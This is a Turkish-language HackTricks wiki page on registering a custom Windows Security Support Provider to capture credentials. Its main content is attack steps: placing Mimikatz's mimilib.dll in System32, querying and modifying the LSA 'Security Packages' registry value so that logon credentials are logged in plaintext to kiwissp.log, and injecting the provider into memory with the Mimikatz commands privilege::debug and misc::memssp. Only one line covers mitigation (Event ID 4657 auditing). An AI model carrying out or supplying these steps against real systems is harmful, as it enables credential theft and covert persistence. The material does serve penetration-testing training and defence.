Custom SSP

Reading time: 2 minutes

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

Custom SSP

SSP (Güvenlik Destek Sağlayıcısı) nedir burada öğrenin.
Kendi SSP'nizi oluşturabilirsiniz, böylece makineye erişim için kullanılan kimlik bilgilerini düz metin olarak yakalayabilirsiniz.

Mimilib

Mimikatz tarafından sağlanan mimilib.dll ikili dosyasını kullanabilirsiniz. Bu, tüm kimlik bilgilerini düz metin olarak bir dosyaya kaydedecektir.
Dll dosyasını C:\Windows\System32\ dizinine bırakın.
Mevcut LSA Güvenlik Paketlerinin bir listesini alın:

attacker@target
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dll'yi Güvenlik Destek Sağlayıcı listesine (Güvenlik Paketleri) ekleyin:

powershell
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Ve bir yeniden başlatmadan sonra tüm kimlik bilgileri C:\Windows\System32\kiwissp.log dosyasında düz metin olarak bulunabilir.

Bellekte

Bunu doğrudan belleğe Mimikatz kullanarak da enjekte edebilirsiniz (biraz kararsız/çalışmayabileceğini unutmayın):

powershell
privilege::debug
misc::memssp

Bu yeniden başlatmalara dayanmaz.

Hafifletme

Olay ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages oluşturma/değiştirme denetimi

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin